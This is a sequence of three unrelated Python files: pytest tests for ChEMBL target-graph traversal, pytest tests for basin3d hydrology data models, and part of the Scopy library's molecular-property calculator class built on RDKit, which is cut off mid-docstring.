<reponame>dmyersturnbull/chembler<filename>tests/model/test_targets_real_data.py<gh_stars>0
from typing import Mapping
import pytest
from mandos.entry.api_singletons import Apis
from mandos.model.apis.chembl_support.chembl_target_graphs import (
ChemblTargetGraphFactory,
TargetEdgeReqs,
TargetNode,
TargetRelType,
)
from mandos.model.apis.chembl_support.chembl_targets import TargetFactory, TargetType
factory = TargetFactory(Apis.Chembl)
graph_factory = ChemblTargetGraphFactory.create(Apis.Chembl, factory)
class TestTargets:
def test_traverse_gabaa_up(self):
target = factory.find("CHEMBL2109243")
assert target.chembl == "CHEMBL2109243"
link_types = TargetEdgeReqs.cross(
TargetType.protein_types(),
{TargetRelType.subset_of},
TargetType.protein_types(),
)
accepted = graph_factory.at_target(target).traverse(link_types)
assert {t.target.chembl for t in accepted} == {"CHEMBL2109243", "CHEMBL2093872"}
def test_traverse_gabaa_up_mouse(self):
# a single protein
# branches to GABA A channel complex group CHEMBL2094133
# but also to complexes CHEMBL4296058 and CHEMBL4296059
# weirdly, CHEMBL4296058 then joins up with CHEMBL2094133
# but CHEMBL4296059 does not (it only joins through an OVERLAPS WITH rel)
# so that one SHOULD be an "end" (which wouldn't be true in a real traversal strategy, hopefully)
target = factory.find("CHEMBL3139")
assert target.chembl == "CHEMBL3139"
link_types = TargetEdgeReqs.cross(
TargetType.protein_types(),
{TargetRelType.subset_of},
TargetType.protein_types(),
)
accepted = graph_factory.at_target(target).traverse(link_types)
vals: Mapping[str, TargetNode] = {a.target.chembl: a for a in accepted}
assert {t.target.chembl for t in accepted} == {
"CHEMBL2094133",
"CHEMBL3139",
"CHEMBL4296058",
"CHEMBL4296059",
}
assert not vals["CHEMBL3139"].is_end
assert vals["CHEMBL2094133"].is_end
assert not vals["CHEMBL4296058"].is_end
assert vals["CHEMBL4296059"].is_end
assert vals["CHEMBL3139"].depth == 0
assert vals["CHEMBL2094133"].depth == 1 # breadth-first!
assert vals["CHEMBL2094133"].depth == 1
assert vals["CHEMBL4296058"].depth == 1
assert vals["CHEMBL3139"].link_reqs is None
assert vals["CHEMBL2094133"].link_reqs == TargetEdgeReqs(
TargetType.single_protein,
None,
TargetRelType.subset_of,
TargetType.protein_complex_group,
None,
)
assert vals["CHEMBL4296058"].link_reqs == TargetEdgeReqs(
TargetType.single_protein,
None,
TargetRelType.subset_of,
TargetType.protein_complex,
None,
)
assert vals["CHEMBL4296059"].link_reqs == TargetEdgeReqs(
TargetType.single_protein,
None,
TargetRelType.subset_of,
TargetType.protein_complex,
None,
)
def test_traverse_gabaa_up_mouse_2(self):
# this is about the same, but now we'll allow that OVERLAPS WITH rel
# so we won't find them here
target = factory.find("CHEMBL3139")
assert target.chembl == "CHEMBL3139"
link_types = TargetEdgeReqs.cross(
TargetType.protein_types(),
{TargetRelType.subset_of},
TargetType.protein_types(),
)
link_types.add(
TargetEdgeReqs(
TargetType.protein_complex,
None,
TargetRelType.overlaps_with,
TargetType.protein_complex_group,
None,
)
)
accepted = graph_factory.at_target(target).traverse(link_types)
vals: Mapping[str, TargetNode] = {a.target.chembl: a for a in accepted}
assert {t.target.chembl for t in accepted} == {
"CHEMBL2094133",
"CHEMBL3139",
"CHEMBL4296058",
"CHEMBL4296059",
}
assert not vals["CHEMBL3139"].is_end
assert vals["CHEMBL2094133"].is_end
assert not vals["CHEMBL4296058"].is_end
# here's the difference:
# by adding the OVERLAPS WITH rel, it now knows it's not at the end
assert not vals["CHEMBL4296059"].is_end
assert vals["CHEMBL3139"].depth == 0
assert vals["CHEMBL2094133"].depth == 1 # breadth-first!
assert vals["CHEMBL2094133"].depth == 1
assert vals["CHEMBL4296058"].depth == 1
assert vals["CHEMBL3139"].link_reqs is None
assert vals["CHEMBL2094133"].link_reqs == TargetEdgeReqs(
TargetType.single_protein,
None,
TargetRelType.subset_of,
TargetType.protein_complex_group,
None,
)
assert vals["CHEMBL4296058"].link_reqs == TargetEdgeReqs(
TargetType.single_protein,
None,
TargetRelType.subset_of,
TargetType.protein_complex,
None,
)
assert vals["CHEMBL4296059"].link_reqs == TargetEdgeReqs(
TargetType.single_protein,
None,
TargetRelType.subset_of,
TargetType.protein_complex,
None,
)
def test_traverse_gabaa_up_and_down(self):
target = factory.find("CHEMBL2109243")
link_types = TargetEdgeReqs.cross(
TargetType.protein_types(),
{TargetRelType.subset_of, TargetRelType.superset_of},
TargetType.protein_types(),
)
accepted = graph_factory.at_target(target).traverse(link_types)
# based on the docs I wrote, originally by looking thru the search results
assert len(accepted) > 40
assert len(accepted) < 60
assert {"GABA" in t.target.name.upper() for t in accepted}
if __name__ == "__main__":
pytest.main()
|
<gh_stars>1-10
import pytest
from basin3d.core.models import AbsoluteCoordinate, AltitudeCoordinate, Coordinate, DepthCoordinate, \
GeographicCoordinate, MeasurementTimeseriesTVPObservation, MonitoringFeature, Observation, ObservedProperty, \
ObservedPropertyVariable, RelatedSamplingFeature, RepresentativeCoordinate, ResultQuality, TimeValuePair, \
VerticalCoordinate, DataSource
from basin3d.core.types import FeatureTypes, SamplingMedium, SpatialSamplingShapes
@pytest.fixture
def observed_property_var():
"""
Load some fake data to use in the tests
"""
return ObservedPropertyVariable(basin3d_id='FH2O', full_name='Groundwater Flux',
categories=['Hydrology', 'Subsurface'], units='m3/m/s')
@pytest.fixture
def observed_property(datasource, observed_property_var):
return ObservedProperty(datasource_variable='water_flux', observed_property_variable=observed_property_var,
sampling_medium=SamplingMedium.WATER, datasource=datasource,
datasource_description='a test variable')
def test_data_source_model(datasource):
"""Test DataSource model"""
assert datasource.id == 'Alpha'
assert datasource.name == 'Alpha'
assert datasource.id_prefix == 'A'
assert datasource.location == 'https://asource.foo/'
def test_observed_property_create(observed_property, observed_property_var, datasource):
""" Was the object created correctly? """
assert observed_property.sampling_medium == SamplingMedium.WATER
assert observed_property.datasource_variable == 'water_flux'
assert observed_property.observed_property_variable == observed_property_var
assert observed_property.datasource == datasource
assert observed_property.datasource_description == 'a test variable'
def test_observed_property_variable_create(observed_property_var):
""" create the object and test attributes """
assert observed_property_var.basin3d_id == 'FH2O'
assert observed_property_var.full_name == 'Groundwater Flux'
assert observed_property_var.categories == ['Hydrology', 'Subsurface']
assert observed_property_var.units == 'm3/m/s'
def test_representative_coordinate():
"""Test a Representative Coordinate"""
r_coord = RepresentativeCoordinate(
representative_point=AbsoluteCoordinate(
horizontal_position=GeographicCoordinate(
units=GeographicCoordinate.UNITS_DEC_DEGREES,
latitude=70.4657, longitude=-20.4567),
vertical_extent=AltitudeCoordinate(
datum=AltitudeCoordinate.DATUM_NAVD88,
value=1500, distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),
representative_point_type=RepresentativeCoordinate.REPRESENTATIVE_POINT_TYPE_CENTER_LOCAL_SURFACE)
assert r_coord.representative_point.vertical_extent[0].datum == AltitudeCoordinate.DATUM_NAVD88
assert r_coord.representative_point.vertical_extent[0].value == 1500
assert r_coord.representative_point.vertical_extent[0].distance_units == VerticalCoordinate.DISTANCE_UNITS_FEET
assert r_coord.representative_point.horizontal_position[0].longitude == -20.4567
assert r_coord.representative_point.horizontal_position[0].x == -20.4567
assert r_coord.representative_point.horizontal_position[0].y == 70.4657
assert r_coord.representative_point.horizontal_position[0].latitude == 70.4657
assert r_coord.representative_point.horizontal_position[0].units == GeographicCoordinate.UNITS_DEC_DEGREES
assert r_coord.representative_point_type == RepresentativeCoordinate.REPRESENTATIVE_POINT_TYPE_CENTER_LOCAL_SURFACE
def test_related_sampling_feature(plugin_access_alpha):
"""Test a Related Sampling feature"""
related_sampling_feature = RelatedSamplingFeature(plugin_access=plugin_access_alpha,
related_sampling_feature='Region1',
related_sampling_feature_type=FeatureTypes.REGION,
role=RelatedSamplingFeature.ROLE_PARENT)
assert related_sampling_feature.datasource == plugin_access_alpha.datasource
assert related_sampling_feature.related_sampling_feature == 'A-Region1'
assert related_sampling_feature.related_sampling_feature_type == FeatureTypes.REGION
assert related_sampling_feature.role == RelatedSamplingFeature.ROLE_PARENT
def test_absolute_coordinate():
a_coord = AltitudeCoordinate(
datum=AltitudeCoordinate.DATUM_NAVD88,
value=1500,
distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)
assert a_coord.datum == AltitudeCoordinate.DATUM_NAVD88
assert a_coord.value == 1500
assert a_coord.distance_units == VerticalCoordinate.DISTANCE_UNITS_FEET
def test_monitoring_feature_create(plugin_access_alpha):
"""Test instance of monitoring feature"""
a_region = MonitoringFeature(
plugin_access=plugin_access_alpha,
id="Region1",
name="AwesomeRegion",
description="This region is really awesome.",
feature_type=FeatureTypes.REGION,
shape=SpatialSamplingShapes.SHAPE_SURFACE,
coordinates=Coordinate(representative=RepresentativeCoordinate(
representative_point=AbsoluteCoordinate(
horizontal_position=GeographicCoordinate(
units=GeographicCoordinate.UNITS_DEC_DEGREES,
latitude=70.4657, longitude=-20.4567),
vertical_extent=AltitudeCoordinate(
datum=AltitudeCoordinate.DATUM_NAVD88,
value=1500, distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),
representative_point_type=RepresentativeCoordinate.REPRESENTATIVE_POINT_TYPE_CENTER_LOCAL_SURFACE)
)
)
assert a_region.datasource.id == 'Alpha'
assert a_region.id == 'A-Region1'
assert a_region.name == 'AwesomeRegion'
assert a_region.feature_type == FeatureTypes.REGION
assert a_region.description == 'This region is really awesome.'
assert a_region.shape == SpatialSamplingShapes.SHAPE_SURFACE
assert a_region.coordinates.representative.representative_point.horizontal_position[0].units == \
GeographicCoordinate.UNITS_DEC_DEGREES
assert a_region.coordinates.representative.representative_point.horizontal_position[0].latitude == 70.4657
assert a_region.coordinates.representative.representative_point.horizontal_position[0].longitude == -20.4567
assert a_region.coordinates.representative.representative_point.vertical_extent[0].datum == \
AltitudeCoordinate.DATUM_NAVD88
assert a_region.coordinates.representative.representative_point.vertical_extent[0].value == 1500
assert a_region.coordinates.representative.representative_point.vertical_extent[0].distance_units == \
VerticalCoordinate.DISTANCE_UNITS_FEET
assert a_region.coordinates.representative.representative_point_type == \
RepresentativeCoordinate.REPRESENTATIVE_POINT_TYPE_CENTER_LOCAL_SURFACE
a_point = MonitoringFeature(
plugin_access=plugin_access_alpha,
id='1',
name='Point Location 1',
description='The first point.',
feature_type=FeatureTypes.POINT,
shape=SpatialSamplingShapes.SHAPE_POINT,
coordinates=Coordinate(
absolute=AbsoluteCoordinate(
horizontal_position=GeographicCoordinate(
units=GeographicCoordinate.UNITS_DEC_DEGREES,
latitude=70.4657, longitude=-20.4567),
vertical_extent=AltitudeCoordinate(
datum=AltitudeCoordinate.DATUM_NAVD88,
value=1500,
distance_units=VerticalCoordinate.DISTANCE_UNITS_FEET)),
representative=RepresentativeCoordinate(
vertical_position=DepthCoordinate(
datum=DepthCoordinate.DATUM_LOCAL_SURFACE,
value=-0.5, distance_units=VerticalCoordinate.DISTANCE_UNITS_METERS)
)
),
observed_property_variables=['Ag', 'Acetate'],
related_sampling_feature_complex=[
RelatedSamplingFeature(plugin_access=plugin_access_alpha,
related_sampling_feature='Region1',
related_sampling_feature_type=FeatureTypes.REGION,
role=RelatedSamplingFeature.ROLE_PARENT)]
)
assert a_point.datasource.id == 'Alpha'
assert a_point.id == 'A-1'
assert a_point.name == 'Point Location 1'
assert a_point.feature_type == FeatureTypes.POINT
assert a_point.description == 'The first point.'
assert a_point.shape == SpatialSamplingShapes.SHAPE_POINT
assert a_point.coordinates.absolute.horizontal_position[0].units == \
GeographicCoordinate.UNITS_DEC_DEGREES
assert a_point.coordinates.absolute.horizontal_position[0].latitude == 70.4657
assert a_point.coordinates.absolute.horizontal_position[0].longitude == -20.4567
assert a_point.coordinates.absolute.vertical_extent[0].datum == \
AltitudeCoordinate.DATUM_NAVD88
assert a_point.coordinates.absolute.vertical_extent[0].value == 1500
assert a_point.coordinates.absolute.vertical_extent[0].distance_units == \
VerticalCoordinate.DISTANCE_UNITS_FEET
assert a_point.coordinates.representative.vertical_position.value == -0.5
assert a_point.coordinates.representative.vertical_position.distance_units == \
VerticalCoordinate.DISTANCE_UNITS_METERS
assert a_point.coordinates.representative.vertical_position.datum == \
DepthCoordinate.DATUM_LOCAL_SURFACE
assert a_point.observed_property_variables == ['ACT', 'Ag']
assert a_point.related_sampling_feature_complex[0].related_sampling_feature == 'A-Region1'
assert a_point.related_sampling_feature_complex[0].role == 'PARENT'
def test_observation_create(plugin_access_alpha):
"""
Test instance of observation model class
NOTE: In practice, the Observation should not be used stand alone
"""
obs01 = Observation(
plugin_access=plugin_access_alpha,
id='timeseries01',
utc_offset='9',
phenomenon_time='20180201',
result_quality=ResultQuality().RESULT_QUALITY_CHECKED,
feature_of_interest='Point011')
assert obs01.datasource.id == 'Alpha'
assert obs01.id == 'A-timeseries01'
assert obs01.utc_offset == '9'
assert obs01.phenomenon_time == '20180201'
assert obs01.observed_property is None
assert obs01.result_quality == ResultQuality().RESULT_QUALITY_CHECKED
assert obs01.feature_of_interest == 'Point011'
def test_measurement_timeseries_tvp_observation_create(plugin_access_alpha):
"""Test instance of Measurement Timeseries TVP Observation"""
obs01 = MeasurementTimeseriesTVPObservation(
plugin_access=plugin_access_alpha,
id='timeseries01',
utc_offset='9',
phenomenon_time='20180201',
result_quality=ResultQuality().RESULT_QUALITY_CHECKED,
feature_of_interest='Point011',
feature_of_interest_type=FeatureTypes.POINT,
aggregation_duration='daily',
time_reference_position='start',
observed_property_variable='Acetate',
statistic='mean',
result_points=[TimeValuePair('201802030100', '5.32')],
unit_of_measurement='m'
)
assert obs01.id == 'A-timeseries01'
assert obs01.utc_offset == '9'
assert obs01.phenomenon_time == '20180201'
assert obs01.observed_property == ObservedProperty(
datasource_variable='Acetate',
observed_property_variable=ObservedPropertyVariable(
basin3d_id='ACT', full_name='Acetate (CH3COO)',
categories=['Biogeochemistry', 'Anions'], units='mM'),
sampling_medium=SamplingMedium.WATER,
datasource=DataSource(
id='Alpha', name='Alpha', id_prefix='A',
location='https://asource.foo/', credentials={}),
datasource_description='')
assert obs01.observed_property_variable == 'ACT'
assert obs01.result_quality == ResultQuality.RESULT_QUALITY_CHECKED
assert obs01.feature_of_interest == 'Point011'
assert obs01.feature_of_interest_type == FeatureTypes.POINT
assert obs01.aggregation_duration == 'daily'
assert obs01.time_reference_position == 'start'
assert obs01.statistic == 'mean'
assert obs01.unit_of_measurement == 'm'
assert obs01.datasource.id == 'Alpha'
|
<reponame>SorchaYang/Scopy
# -*- coding: utf-8 -*-
#Created on Mon Jul 8 10:03:32 2019
#
#@Author: <NAME>, <NAME>
#@Institution: CBDD Group, Xiangya School of Pharmaceutical Science, CSU, China,
#@Homepage: http://www.scbdd.com
#@Mail: <EMAIL>; <EMAIL>
#@Blog: https://blog.moyule.me
from multiprocessing import Pool
from functools import partial
from rdkit import Chem
try:
from . import rulesfilter
from . import molproperty
except:
import rulesfilter
import molproperty
def _GetSmi(mol):
"""
Get the SMILES of molecule
:param mols: molecule
:type mols: rdkit.Chem.rdchem.Mol
:return: The SMILES of molecule
:rtype: string
"""
return Chem.MolToSmiles(mol)
class PC_properties(object):
"""
Here, we comdat the whole function that computing property retrieved from module molproperty
:param mols: The molecule to be scanned.
:type mols: Iterable object, each element is rdkit.Chem.rdchem.Mol
:param n_jobs: The number of CPUs to use to do the computation, defaults to 1
:type n_jobs: int, optional
"""
def __init__(self, mols, n_jobs=1):
self.mols = list(mols)
self.n_jobs = n_jobs if n_jobs>=1 else None
def CalculateMolWeight(self):
"""
Calculation of molecular weight(contain hydrogen atoms)
--->MW
:param mols: molecules
:type mols: Iterable
:return: the weight of molecule(contain hydrogen atoms)
:rtype: list
"""
pool = Pool(self.n_jobs)
MW = pool.map_async(molproperty.CalculateMolWeight, self.mols).get()
pool.close()
pool.join()
return MW
def CalculateNumBonds(self):
"""
Calculation the number of bonds where between heavy atoms
--->nBond
:param mols: molecules
:type mols: Iterable
:return: the number of bonds where between heavy atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
nBond = pool.map_async(molproperty.CalculateNumBonds, self.mols).get()
pool.close()
pool.join()
return nBond
def CalculateNumAtoms(self):
"""
Calculation of the number of atoms in molecular(contain hydrogen atoms)
--->nAtom
:param mols: molecules
:type mols: Iterable
:return: the number of atoms in molecular(contain hydrogen atoms)
:rtype: int
"""
pool = Pool(self.n_jobs)
nAtom = pool.map_async(molproperty.CalculateNumAtoms, self.mols).get()
pool.close()
pool.join()
return nAtom
def CalculateNumHetero(self):
"""
Calculation of the number of heteroatom in a molecule
--->nHet
:param mols: molecules
:type mols: Iterable
:return: the number of heteroatom in a molecule
:rtype: list
"""
pool = Pool(self.n_jobs)
nHet = pool.map_async(molproperty.CalculateNumHetero, self.mols).get()
pool.close()
pool.join()
return nHet
def CalculateNumRotatableBonds(self):
"""
Calculation of the number of rotatableBonds
--->nRot
Note:
In some situaion Amide C-N bonds are not considered
because of their high rotational energy barrier
:param mols: molecules
:type mols: Iterable
:return: the number of rotatableBond
:rtype: list
"""
pool = Pool(self.n_jobs)
nRot = pool.map_async(molproperty.CalculateNumRotatableBonds, self.mols).get()
pool.close()
pool.join()
return nRot
def CalculateNumRigidBonds(self):
"""
Number of non-flexible bonds, in opposite to rotatable bonds
--->nRig
:param mols: molecules
:type mols: Iterable
:return: the number of non-flexible bonds
:rtype: list
"""
pool = Pool(self.n_jobs)
nRig = pool.map_async(molproperty.CalculateNumRigidBonds, self.mols).get()
pool.close()
pool.join()
return nRig
def CalculateFlexibility(self):
"""
The flexibility (ration between rotatable and rigid bonds)
--->Flex
:param mol: molecules
:type mol: rdkit.Chem.rdchem.Mol
:return: the number of ring
:rtype: list
"""
pool = Pool(self.n_jobs)
Flex = pool.map_async(molproperty.CalculateFlexibility, self.mols).get()
pool.close()
pool.join()
return Flex
def CalculateNumRing(self):
"""
Calculation of the number of ring
--->nRing
:param mols: molecules
:type mols: Iterable
:return: the number of ring
:rtype: list
"""
pool = Pool(self.n_jobs)
nRing = pool.map_async(molproperty.CalculateNumRing, self.mols).get()
pool.close()
pool.join()
return nRing
def CalculateNumHeavyAtom(self):
"""
Calculation of Heavy atom counts in a molecule
--->nHev
:param mols: molecules
:type mols: Iterable
:return: the number of heavy atom counts in a molecule
:rtype: list
"""
pool = Pool(self.n_jobs)
nHev = pool.map_async(molproperty.CalculateNumHeavyAtom, self.mols).get()
pool.close()
pool.join()
return nHev
def CalculateLogD(self):
import sys
import csv
try:
from .. import ScoConfig
except:
sys.path.append('..')
import ScoConfig
try:
from ..fingerprint.fingerprints import CalculateGhoseCrippen
except:
sys.path.append('..')
from fingerprint.fingerprints import CalculateGhoseCrippen
"""
Calculation of molecular logD under pH=7.4
--->LogD
Note:
We have built a liner model with DNN to predict logD7.4.
:param mols: molecules
:type mols: Iterable
:return: molecular logD under pH=7.4
:rtype: list
"""
intercept = 0.5748907159915493
fps = CalculateGhoseCrippen(self.mols,self.n_jobs)
with open(ScoConfig.CrippenDir + '\\Crippen.txt') as f_obj:
lines = csv.reader(f_obj,delimiter='\t')
next(lines)
contri = [x[-1] for x in lines]
contri = [float(x) for x in contri]
f_obj.close()
logD = (fps*contri).sum(axis=1) + intercept
return list(logD)
def CalculateLogP(self):
"""
Calculation of molecular LogP
--->logP
:param mols: molecules
:type mols: Iterable
:return: molecular logP
:rtype: float
"""
pool = Pool(self.n_jobs)
logp = pool.map_async(molproperty.CalculateLogP, self.mols).get()
pool.close()
pool.join()
return logp
def CheckAcid(self):
"""
Judge a molecular whether is acid via SMARTS.
These SMARTS retrived from https://www.daylight.com/dayhtml_tutorials/languages/smarts/smarts_examples.html
--->ab
:param mols: molecules
:type mols: Iterable
:return: classification to acid or base
:rtype: list
"""
pool = Pool(self.n_jobs)
ab = pool.map_async(molproperty.CheckAcid, self.mols).get()
pool.close()
pool.join()
return ab
def CalculatepKa(self):
"""
*This function should be revised*
Calculating pKa based on the ralation between logD and logP in specific pH.
--->pKa
Eq.:
abs(pH-pKa) = log10(10^(logP-logD)-1)
pKa = pH - log10(10^(logP-logD)-1) for acid
pKa = log10(10^(logP-logD)-1) - pH for base
:param mols: molecules
:type mols: Iterable
:return: molecular pKa
:rtype: list
"""
import warnings
warnings.filterwarnings('ignore')
from math import log10
logDl = self.CalculateLogD()
logPl = self.CalculateLogP()
statusl = self.CheckAcid()
res = []
for status,logP, logD in zip(statusl,logPl,logDl):
try:
if status == 'acid':
pKa = 7.4 - log10(10**(logP-logD)-1)
else:
pKa = log10(10**(logP-logD)-1) - 7.4
res.append(pKa)
except:
res.append('N/A')
return res
def CalculateMolMR(self):
"""
Cacluation of molecular refraction value based on Crippen method
--->MR
:param mols: molecules
:type mols: Iterable
:return: molecular refraction value based on Crippen method
:rtype: list
"""
pool = Pool(self.n_jobs)
mr = pool.map_async(molproperty.CalculateMolMR, self.mols).get()
pool.close()
pool.join()
return mr
def CalculateNumHDonors(self):
"""
Caculation of the number of Hydrogen Bond Donors
--->nHD
:param mols: molecules
:type mols: Iterable
:return: the number of Hydrogen Bond Donors
:rtype: list
"""
pool = Pool(self.n_jobs)
nHD = pool.map_async(molproperty.CalculateNumHDonors, self.mols).get()
pool.close()
pool.join()
return nHD
def CalculateNumHAcceptors(self):
"""
Caculation of the number of Hydrogen Bond Acceptors
--->nHA
:param mols: molecules
:type mols: Iterable
:return: the number of Hydrogen Bond Acceptors
:rtype: list
"""
pool = Pool(self.n_jobs)
nHA = pool.map_async(molproperty.CalculateNumHAcceptors, self.mols).get()
pool.close()
pool.join()
return nHA
def CalculateNumHyBond(self):
"""
Sum of Hydrogen Bond Donnors and Acceptors
--->nHB
:param mols: molecules
:type mols: Iterable
:return: sum of Hydrogen Bond Donnors and Acceptors
:rtype: list
"""
pool = Pool(self.n_jobs)
nHB = pool.map_async(molproperty.CalculateNumHyBond, self.mols).get()
pool.close()
pool.join()
return nHB
def CalculateAromaticProportion(self):
"""
The proportion of heavy atoms in the molecule that are in an aromatic ring
--->AP
:param mols: molecules
:type mols: Iterable
:return: the proportion of heavy atoms in the molecule that are in an aromatic ring
:rtype: list
"""
pool = Pool(self.n_jobs)
aroma = pool.map_async(molproperty.CalculateAromaticProportion, self.mols).get()
pool.close()
pool.join()
return aroma
def CalculateLogSw(self):
"""
The logSw represents the logarithm of compounds water solubility computed by the ESOL method
--->logSw
Equation:
Log(Sw) = 0.16-0.638*clogP-0.0062*MWT+0.066*RB-0.74*AP
where, MWT: Molecular Weight; RB: Rotatable bonds; AP: Aromatic proportion
Reference:
(1) `<NAME> (2004)`_.
:param mols: molecules
:type mols: Iterable
:return: the molecular logSw
:rtype: list
.. _<NAME> (2004):
https://pubs.acs.org/doi/abs/10.1021/ci034243x
"""
pool = Pool(self.n_jobs)
logSw = pool.map_async(molproperty.CalculateLogSw, self.mols).get()
pool.close()
pool.join()
return logSw
def CalculateFsp3(self):
"""
Fsp3 (carbon bond saturation) is defined as the number of sp3 hybridized carbons / total carbon count.
--->FSP3
:param mols: molecules
:type mols: Iterable
:return: the carbon bond saturation
:rtype: list
"""
pool = Pool(self.n_jobs)
fsp3 = pool.map_async(molproperty.CalculateFsp3, self.mols).get()
pool.close()
pool.join()
return fsp3
def CalculateTPSA(self):
"""
Calculation of TPSA
--->TPSA
:param mols: molecules
:type mols: Iterable
:return: TPSA
:rtype: list
"""
pool = Pool(self.n_jobs)
tpsa = pool.map_async(molproperty.CalculateTPSA, self.mols).get()
pool.close()
pool.join()
return tpsa
def CalculateQEDmean(self):
"""
Calculation QED descriptor under different weights
A descriptor a measure of drug-likeness based on the concept of desirability
Here, calculating the QED descriptor using average descriptor weights.
--->QEDmean
Reference:
(1) `<NAME> (2012)`_.
:param mols: molecules
:type mols: Iterable
:return: QED descriptor using average descriptor weights
:rtype: list
.. _<NAME> (2012):
https://www.nature.com/nchem/journal/v4/n2/abs/nchem.1243.html
"""
pool = Pool(self.n_jobs)
qed_mean = pool.map_async(molproperty.CalculateQEDmean, self.mols).get()
pool.close()
pool.join()
return qed_mean
def CalculateQEDmax(self):
"""
Calculation QED descriptor under different weights
A descriptor a measure of drug-likeness based on the concept of desirability
Here, calculating the QED descriptor using maximal descriptor weights.
--->QEDmax
Reference:
(1) `<NAME> (2012)`_.
:param mols: molecules
:type mols: Iterable
:return: QED descriptor using maximal descriptor weights
:rtype: list
.. _<NAME> (2012):
https://www.nature.com/nchem/journal/v4/n2/abs/nchem.1243.html
"""
pool = Pool(self.n_jobs)
qed_max = pool.map_async(molproperty.CalculateQEDmax, self.mols).get()
pool.close()
pool.join()
return qed_max
def CalculateQEDnone(self):
"""
Calculation QED descriptor under different weights
A descriptor a measure of drug-likeness based on the concept of desirability
Here, calculating the QED descriptor using unit weights.
--->QEDnone
Reference:
(1) `<NAME> (2012)`_.
:param mols: molecules
:type mols: Iterable
:return: QED descriptor using unit weights
:rtype: list
.. _<NAME> (2012):
https://www.nature.com/nchem/journal/v4/n2/abs/nchem.1243.html
"""
pool = Pool(self.n_jobs)
qed_none = pool.map_async(molproperty.CalculateQEDnone, self.mols).get()
pool.close()
pool.join()
return qed_none
def CalculateMaxSizeSystemRing(self):
"""
Number of atoms involved in the biggest system ring
---> maxring
:param mols: molecules
:type mols: Iterable
:return: number of atoms involved in the biggest system ring
:rtype: list
"""
pool = Pool(self.n_jobs)
maxring = pool.map_async(molproperty.CalculateMaxSizeSystemRing, self.mols).get()
pool.close()
pool.join()
return maxring
def CalculateNumStereocenters(self):
"""
*This can not implement under multiprocessing*
The number of stereo centers
--->nStereo
:param mols: molecules
:type mols: Iterable
:return: the number of stereo centers
:rtype: list
"""
nStereo = map(molproperty.CalculateNumStereocenters, self.mols)
return list(nStereo)
def CalculateNumCarbon(self):
"""
Calculation of Carbon number in a molecule
--->nC
:param mols: molecules
:type mols: Iterable
:return: the number of carbon atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
nC = pool.map_async(molproperty.CalculateNumCarbon, self.mols).get()
pool.close()
pool.join()
return nC
def CalculateNumBoron(self):
"""
Calculation of Boron counts in a molecule
--->nB
:param mols: molecules
:type mols: Iterable
:return: the number of boron atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
nB = pool.map_async(molproperty.CalculateNumBoron, self.mols).get()
pool.close()
pool.join()
return nB
def CalculateNumFluorin(self):
"""
Calculation of Fluorin counts in a molecule
--->nF
:param mols: molecules
:type mols: Iterable
:return: the number of fluori atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
nF = pool.map_async(molproperty.CalculateNumFluorin, self.mols).get()
pool.close()
pool.join()
return nF
def CalculateNumChlorin(self):
"""
Calculation of Chlorin counts in a molecule
--->nCl
:param mols: molecules
:type mols: Iterable
:return: the number of chlorin atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
nCl = pool.map_async(molproperty.CalculateNumChlorin, self.mols).get()
pool.close()
pool.join()
return nCl
def CalculateNumBromine(self):
"""
Calculation of Bromine counts in a molecule
--->nBr
:param mols: molecules
:type mols: Iterable
:return: the number of bromine atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
nBr = pool.map_async(molproperty.CalculateNumBromine, self.mols).get()
pool.close()
pool.join()
return nBr
def CalculateNumIodine(self):
"""
Calculation of Iodine counts in a molecule
--->nI
:param mols: molecules
:type mols: Iterable
:return: the number of bromine atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
nI = pool.map_async(molproperty.CalculateNumIodine, self.mols).get()
pool.close()
pool.join()
return nI
def CalculateNumPhosphor(self):
"""
Calcualtion of Phosphor number in a molecule
--->nP
:param mols: molecules
:type mols: Iterable
:return: the number of phosphor atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
nP = pool.map_async(molproperty.CalculateNumPhosphor, self.mols).get()
pool.close()
pool.join()
return nP
def CalculateNumSulfur(self):
"""
Calculation of Sulfur counts in a molecule
--->nS
:param mols: molecules
:type mols: Iterable
:return: the number of sulfur atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
nS = pool.map_async(molproperty.CalculateNumSulfur, self.mols).get()
pool.close()
pool.join()
return nS
def CalculateNumOxygen(self):
"""
Calculation of Oxygen counts in a molecule
--->nO
:param mols: molecules
:type mols: Iterable
:return: the number of oxygen atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
nO = pool.map_async(molproperty.CalculateNumOxygen, self.mols).get()
pool.close()
pool.join()
return nO
def CalculateNumNitrogen(self):
"""
Calculation of Nitrogen counts in a molecule
--->nN
:param mols: molecules
:type mols: Iterable
:return: the number of nitrogen atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
nN = pool.map_async(molproperty.CalculateNumNitrogen, self.mols).get()
pool.close()
pool.join()
return nN
def CalculateNumChargedGroups(self):
"""
Number of Charged Groups
--->nChar
:param mols: molecules
:type mols: Iterable
:return: the number of charged group
:rtype: list
"""
pass
def CalculateHetCarbonRatio(self):
"""
The ratio between the number of non carbon atoms and the number of carbon atoms.
--->HetRatio
:param mols: molecules
:type mols: Iterable
:return: the ratio between the number of non carbon atoms and the number of carbon atoms
:rtype: list
"""
pool = Pool(self.n_jobs)
HetRatio = pool.map_async(molproperty.CalculateHetCarbonRatio, self.mols).get()
pool.close()
pool.join()
return HetRatio
def CalculateSAscore(self):
"""
A function to estimate ease of synthesis (synthetic accessibility) of drug-like molecules
--->SAscore
Reference:
(1) `Ertl, Peter, and <NAME> (2009)`_.
:param mols: molecules
:type mols: Iterable
:return: ease of synthesis
:rtype: list
.. _Ertl, Peter, and <NAME> (2009):
https://jcheminf.biomedcentral.com/articles/10.1186/1758-2946-1-8
"""
pool = Pool(self.n_jobs)
SA = pool.map_async(molproperty.CalculateSAscore, self.mols).get()
pool.close()
pool.join()
return SA
def CalculateNPscore(self):
"""
A function to calculate the natural product-likeness score
--->NPscore
Reference:
(1) `Ertl (2008)`_.
:param mols: molecules
:type mols: Iterable
:return: product-likeness score
